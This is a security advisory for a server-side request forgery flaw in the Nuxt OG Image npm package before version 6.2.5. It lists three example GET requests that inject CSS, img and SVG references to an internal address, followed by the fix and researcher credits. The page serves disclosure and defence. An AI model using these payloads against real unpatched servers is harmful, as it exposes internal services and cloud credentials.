PT-2026-32078 · Npm · Nuxt Og Image

Publicado

2026-03-31

·

Atualizado

2026-03-31

CVSS v3.1

5.3

Média

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Product: Nuxt OG Image Version: < 6.2.5 CWE-ID: CWE-918: Server-Side Request Forgery

Description

The image generation endpoint (/ og/d/) accepts user-controlled parameters that are passed to the server-side renderer without proper validation or filtering. An attacker can trigger server-side requests to internal network addresses through multiple vectors.

Impact

  • Scanning internal ports and services inaccessible from the outside
  • Reading sensitive data from cloud infrastructure metadata services (tokens, credentials) when verbose error output is enabled

Attack Vectors

Three distinct vectors were identified, all exploiting the same underlying lack of URL validation:

Vector 1: CSS background-image injection via style parameter

GET / og/d/og.png?style=background-image:+url('http://127.0.0.1:8888/secret')

Vector 2: <img src> injection via html parameter

GET / og/d/og.png?html=<img src="http://127.0.0.1:8888/secret">
When verbose errors are enabled, the response content is leaked in base64-encoded error messages.

Vector 3: SVG <image href> injection via html parameter

GET / og/d/og.png?html=<svg><image href="http://127.0.0.1:8888/secret"></svg>

Mitigation

Fixed in v6.2.5. The image source plugin now blocks requests to private IP ranges (IPv4/IPv6), loopback addresses, link-local addresses, and cloud metadata endpoints. Decimal/hexadecimal IP encoding bypasses are also handled.

Credits

Researcher: Dmitry Prokhorov (Positive Technologies)

Correção

SSRF

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-918

Identificadores relacionados

GHSA-PQHR-MP3F-HRPP

Produtos afetados

Nuxt Og Image